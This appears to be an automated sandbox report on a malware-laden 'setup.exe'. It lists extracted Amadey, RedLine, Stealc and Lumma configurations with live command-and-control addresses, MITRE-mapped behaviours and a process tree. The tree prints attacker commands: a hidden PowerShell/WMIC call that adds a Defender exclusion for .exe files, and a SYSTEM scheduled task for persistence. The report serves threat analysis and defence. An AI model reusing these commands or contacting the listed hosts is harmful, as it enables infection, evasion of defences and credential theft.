amadey | 0bfeb9c0d367f6caf4a1dd78b9855a3074930d1197012fbb3ca546b77200e108

Resubmissions

05-07-2024 16:45

240705-t9gyys1hrn 10

05-07-2024 16:32

240705-t2a6fa1gnn 10

Analysis

max time kernel
117s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
05-07-2024 16:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

794.4MB
MD5

6d95cb153d6806c9f408fa1d17253001
SHA1

38371c4df014bf03ea0430392202b78319f4b09f
SHA256

a04defc1f6811ebb64907ad79c63c2ccedb2cba15afca05758f537768da7b934
SHA512

0ab1800b639709648e82c9370e727999de9b5564107cd41b2d0ff5bbbb6f324a854ef5a5269cd8c3f3ac96c669014b9eac398c8902e47d779027b6726aec95d2
SSDEEP

98304:dmg6rK+6/Murdncf8kJPBesTcbMl3sjWpoDELiDKzyeByA:doYMKaP5eqcbM5sOLiDheB

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

redline

Botnet

newlogs

85.28.47.7:17210

Extracted

Family

stealc

Botnet

ZOV

http://40.86.87.10

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

newbuild

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

stealc

Botnet

Nice

http://85.28.47.30

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

lumma

https://radiationnopp.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral15/memory/4764-308-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral15/memory/2892-650-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral15/files/0x0009000000023595-668.dat	family_redline
behavioral15/memory/1384-670-0x00000000002D0000-0x0000000000320000-memory.dmp	family_redline
behavioral15/files/0x00070000000235ab-950.dat	family_redline
behavioral15/memory/5084-971-0x0000000000B60000-0x0000000000BB0000-memory.dmp	family_redline
behavioral15/memory/3996-1269-0x0000000000550000-0x00000000005A2000-memory.dmp	family_redline
behavioral15/files/0x00070000000235cb-1263.dat	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	58CvKozGCw1DTwHaufwfigdh.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1172	powershell.exe
2612	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2808	netsh.exe
1052	netsh.exe
1404	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	58CvKozGCw1DTwHaufwfigdh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	58CvKozGCw1DTwHaufwfigdh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	tgi8pVfXS9AI5LvI0m2WqWHC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	Freshbuild.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	oMGhSvT_ptzUPkEcv4UoD4rG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	58CvKozGCw1DTwHaufwfigdh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 28 IoCs

pid	Process
660	WxQgLy7i8a0dw79q7N8olNGT.exe
5092	58CvKozGCw1DTwHaufwfigdh.exe
716	QmvFiygt8BLBJjKeEFIfRAIP.exe
3996	XoTwNsBf6DyK0cJTjbNyAFHb.exe
4404	btBha1iWLJAAfPm06u1FnJdr.exe
2436	S3cBJoi_jbVaMjU70CLGHd58.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
3324	oMGhSvT_ptzUPkEcv4UoD4rG.exe
8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe
3620	tgi8pVfXS9AI5LvI0m2WqWHC.exe
4260	SN29AUJGd_9ZE4lgghUQ8j9F.exe
740	WjpRpunGh_dNKP04zkujLrHx.exe
4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp
3668	gectorradio32_64.exe
5032	Install.exe
2072	Install.exe
3808	gectorradio32_64.exe
1900	Install.exe
2468	Install.exe
1376	axplong.exe
1208	WBHNbUpROOexfglNpj6JGo1P.exe
1904	crypt6.exe
1384	newlogs.exe
4628	stealc_zov.exe
2560	lualjyq.exe
5084	newbuild.exe
4952	Freshbuild.exe
4124	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Software\Wine	58CvKozGCw1DTwHaufwfigdh.exe
Key opened	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Software\Wine	axplong.exe

Loads dropped DLL 3 IoCs

pid	Process
4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp
1624	h32813gZm4sl3sJWk820YVDL.exe
1624	h32813gZm4sl3sJWk820YVDL.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
120	iplogger.org
121	iplogger.org
252	raw.githubusercontent.com
253	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ipinfo.io
19	ipinfo.io
250	ip-api.com
16	api.myip.com
17	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2872	powercfg.exe
1012	powercfg.exe
2180	powercfg.exe
4552	powercfg.exe
2772	powercfg.exe
1392	powercfg.exe
1524	powercfg.exe
1736	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2984	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
5092	58CvKozGCw1DTwHaufwfigdh.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
1376	axplong.exe
1624	h32813gZm4sl3sJWk820YVDL.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 8 set thread context of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 2436 set thread context of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 3996 set thread context of 4812	3996	XoTwNsBf6DyK0cJTjbNyAFHb.exe	110
PID 1208 set thread context of 1144	1208	WBHNbUpROOexfglNpj6JGo1P.exe	122
PID 1904 set thread context of 2892	1904	crypt6.exe	133
PID 4404 set thread context of 2224	4404	btBha1iWLJAAfPm06u1FnJdr.exe	136

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	Freshbuild.exe
File created	C:\Windows\Tasks\axplong.job	58CvKozGCw1DTwHaufwfigdh.exe
File created	C:\Windows\Tasks\bhSAnxpmVrgvBYDGBw.job	schtasks.exe
File created	C:\Windows\Tasks\bYIjjyXTgczhZAJGMW.job	schtasks.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3356	sc.exe
1508	sc.exe
3984	sc.exe
748	sc.exe
2920	sc.exe
3892	sc.exe
4572	sc.exe
1132	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1752	2436	WerFault.exe	94
2592	8	WerFault.exe	98
4536	1904	WerFault.exe	131
456	3620	WerFault.exe	100
2748	2560	WerFault.exe	156
1804	1708	WerFault.exe	176
4940	1144	WerFault.exe	122

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	h32813gZm4sl3sJWk820YVDL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	h32813gZm4sl3sJWk820YVDL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
2844	WMIC.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4616	timeout.exe
2236	timeout.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
1932	tasklist.exe
3328	tasklist.exe
1140	tasklist.exe
3792	tasklist.exe
380	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1148	ipconfig.exe
4680	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3524	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1556	taskkill.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4080	schtasks.exe
1056	schtasks.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
2112	setup.exe
2112	setup.exe
5092	58CvKozGCw1DTwHaufwfigdh.exe
5092	58CvKozGCw1DTwHaufwfigdh.exe
4260	SN29AUJGd_9ZE4lgghUQ8j9F.exe
4260	SN29AUJGd_9ZE4lgghUQ8j9F.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
1376	axplong.exe
1376	axplong.exe
4812	MSBuild.exe
4812	MSBuild.exe
1172	powershell.exe
1172	powershell.exe
2612	powershell.exe
2612	powershell.exe
1172	powershell.exe
4764	RegAsm.exe
4764	RegAsm.exe
2612	powershell.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
1624	h32813gZm4sl3sJWk820YVDL.exe
2224	BitLockerToGo.exe
2224	BitLockerToGo.exe
2224	BitLockerToGo.exe
2224	BitLockerToGo.exe
4812	MSBuild.exe
4812	MSBuild.exe
4764	RegAsm.exe
4764	RegAsm.exe
4764	RegAsm.exe
4764	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3996	XoTwNsBf6DyK0cJTjbNyAFHb.exe
Token: SeDebugPrivilege	4008	RegAsm.exe
Token: SeBackupPrivilege	4008	RegAsm.exe
Token: SeSecurityPrivilege	4008	RegAsm.exe
Token: SeSecurityPrivilege	4008	RegAsm.exe
Token: SeSecurityPrivilege	4008	RegAsm.exe
Token: SeSecurityPrivilege	4008	RegAsm.exe
Token: SeDebugPrivilege	1208	WBHNbUpROOexfglNpj6JGo1P.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	4764	RegAsm.exe
Token: SeIncreaseQuotaPrivilege	4492	WMIC.exe
Token: SeSecurityPrivilege	4492	WMIC.exe
Token: SeTakeOwnershipPrivilege	4492	WMIC.exe
Token: SeLoadDriverPrivilege	4492	WMIC.exe
Token: SeSystemProfilePrivilege	4492	WMIC.exe
Token: SeSystemtimePrivilege	4492	WMIC.exe
Token: SeProfSingleProcessPrivilege	4492	WMIC.exe
Token: SeIncBasePriorityPrivilege	4492	WMIC.exe
Token: SeCreatePagefilePrivilege	4492	WMIC.exe
Token: SeBackupPrivilege	4492	WMIC.exe
Token: SeRestorePrivilege	4492	WMIC.exe
Token: SeShutdownPrivilege	4492	WMIC.exe
Token: SeDebugPrivilege	4492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4492	WMIC.exe
Token: SeRemoteShutdownPrivilege	4492	WMIC.exe
Token: SeUndockPrivilege	4492	WMIC.exe
Token: SeManageVolumePrivilege	4492	WMIC.exe
Token: 33	4492	WMIC.exe
Token: 34	4492	WMIC.exe
Token: 35	4492	WMIC.exe
Token: 36	4492	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4492	WMIC.exe
Token: SeSecurityPrivilege	4492	WMIC.exe
Token: SeTakeOwnershipPrivilege	4492	WMIC.exe
Token: SeLoadDriverPrivilege	4492	WMIC.exe
Token: SeSystemProfilePrivilege	4492	WMIC.exe
Token: SeSystemtimePrivilege	4492	WMIC.exe
Token: SeProfSingleProcessPrivilege	4492	WMIC.exe
Token: SeIncBasePriorityPrivilege	4492	WMIC.exe
Token: SeCreatePagefilePrivilege	4492	WMIC.exe
Token: SeBackupPrivilege	4492	WMIC.exe
Token: SeRestorePrivilege	4492	WMIC.exe
Token: SeShutdownPrivilege	4492	WMIC.exe
Token: SeDebugPrivilege	4492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4492	WMIC.exe
Token: SeRemoteShutdownPrivilege	4492	WMIC.exe
Token: SeUndockPrivilege	4492	WMIC.exe
Token: SeManageVolumePrivilege	4492	WMIC.exe
Token: 33	4492	WMIC.exe
Token: 34	4492	WMIC.exe
Token: 35	4492	WMIC.exe
Token: 36	4492	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1140	WMIC.exe
Token: SeSecurityPrivilege	1140	WMIC.exe
Token: SeTakeOwnershipPrivilege	1140	WMIC.exe
Token: SeLoadDriverPrivilege	1140	WMIC.exe
Token: SeSystemProfilePrivilege	1140	WMIC.exe
Token: SeSystemtimePrivilege	1140	WMIC.exe
Token: SeProfSingleProcessPrivilege	1140	WMIC.exe
Token: SeIncBasePriorityPrivilege	1140	WMIC.exe
Token: SeCreatePagefilePrivilege	1140	WMIC.exe
Token: SeBackupPrivilege	1140	WMIC.exe
Token: SeRestorePrivilege	1140	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp
5092	58CvKozGCw1DTwHaufwfigdh.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1624	h32813gZm4sl3sJWk820YVDL.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 660	2112	setup.exe	89
PID 2112 wrote to memory of 660	2112	setup.exe	89
PID 2112 wrote to memory of 660	2112	setup.exe	89
PID 2112 wrote to memory of 5092	2112	setup.exe	91
PID 2112 wrote to memory of 5092	2112	setup.exe	91
PID 2112 wrote to memory of 5092	2112	setup.exe	91
PID 2112 wrote to memory of 716	2112	setup.exe	90
PID 2112 wrote to memory of 716	2112	setup.exe	90
PID 2112 wrote to memory of 716	2112	setup.exe	90
PID 2112 wrote to memory of 3996	2112	setup.exe	92
PID 2112 wrote to memory of 3996	2112	setup.exe	92
PID 2112 wrote to memory of 3996	2112	setup.exe	92
PID 2112 wrote to memory of 4404	2112	setup.exe	93
PID 2112 wrote to memory of 4404	2112	setup.exe	93
PID 2112 wrote to memory of 2436	2112	setup.exe	94
PID 2112 wrote to memory of 2436	2112	setup.exe	94
PID 2112 wrote to memory of 2436	2112	setup.exe	94
PID 2112 wrote to memory of 1624	2112	setup.exe	95
PID 2112 wrote to memory of 1624	2112	setup.exe	95
PID 2112 wrote to memory of 1624	2112	setup.exe	95
PID 2112 wrote to memory of 3324	2112	setup.exe	96
PID 2112 wrote to memory of 3324	2112	setup.exe	96
PID 2112 wrote to memory of 3324	2112	setup.exe	96
PID 2112 wrote to memory of 8	2112	setup.exe	98
PID 2112 wrote to memory of 8	2112	setup.exe	98
PID 2112 wrote to memory of 8	2112	setup.exe	98
PID 2112 wrote to memory of 3620	2112	setup.exe	100
PID 2112 wrote to memory of 3620	2112	setup.exe	100
PID 2112 wrote to memory of 3620	2112	setup.exe	100
PID 2112 wrote to memory of 4260	2112	setup.exe	97
PID 2112 wrote to memory of 4260	2112	setup.exe	97
PID 2112 wrote to memory of 740	2112	setup.exe	99
PID 2112 wrote to memory of 740	2112	setup.exe	99
PID 2112 wrote to memory of 740	2112	setup.exe	99
PID 716 wrote to memory of 4956	716	QmvFiygt8BLBJjKeEFIfRAIP.exe	101
PID 716 wrote to memory of 4956	716	QmvFiygt8BLBJjKeEFIfRAIP.exe	101
PID 716 wrote to memory of 4956	716	QmvFiygt8BLBJjKeEFIfRAIP.exe	101
PID 8 wrote to memory of 1652	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	102
PID 8 wrote to memory of 1652	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	102
PID 8 wrote to memory of 1652	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	102
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 8 wrote to memory of 4764	8	B5CdRWBTLXEV2tUJ7kl_iX5x.exe	103
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 2436 wrote to memory of 4008	2436	S3cBJoi_jbVaMjU70CLGHd58.exe	104
PID 4956 wrote to memory of 3668	4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp	129
PID 4956 wrote to memory of 3668	4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp	129
PID 4956 wrote to memory of 3668	4956	QmvFiygt8BLBJjKeEFIfRAIP.tmp	129
PID 660 wrote to memory of 5032	660	WxQgLy7i8a0dw79q7N8olNGT.exe	105
PID 660 wrote to memory of 5032	660	WxQgLy7i8a0dw79q7N8olNGT.exe	105
PID 660 wrote to memory of 5032	660	WxQgLy7i8a0dw79q7N8olNGT.exe	105
PID 740 wrote to memory of 2072	740	WjpRpunGh_dNKP04zkujLrHx.exe	108
PID 740 wrote to memory of 2072	740	WjpRpunGh_dNKP04zkujLrHx.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2844	attrib.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Users\Admin\Documents\SimpleAdobe\WxQgLy7i8a0dw79q7N8olNGT.exe
  C:\Users\Admin\Documents\SimpleAdobe\WxQgLy7i8a0dw79q7N8olNGT.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:660
- - C:\Users\Admin\AppData\Local\Temp\7zS2178.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe
      .\Install.exe /Tdiduy "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:1900
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1220
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 16:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe\" om /ldidVUd 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4080
- C:\Users\Admin\Documents\SimpleAdobe\QmvFiygt8BLBJjKeEFIfRAIP.exe
  C:\Users\Admin\Documents\SimpleAdobe\QmvFiygt8BLBJjKeEFIfRAIP.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Users\Admin\AppData\Local\Temp\is-3ROGR.tmp\QmvFiygt8BLBJjKeEFIfRAIP.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-3ROGR.tmp\QmvFiygt8BLBJjKeEFIfRAIP.tmp" /SL5="$90044,4889829,54272,C:\Users\Admin\Documents\SimpleAdobe\QmvFiygt8BLBJjKeEFIfRAIP.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe
      "C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:3668
  - - C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe
      "C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:3808
- C:\Users\Admin\Documents\SimpleAdobe\58CvKozGCw1DTwHaufwfigdh.exe
  C:\Users\Admin\Documents\SimpleAdobe\58CvKozGCw1DTwHaufwfigdh.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  PID:5092
- - C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
    "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:1376
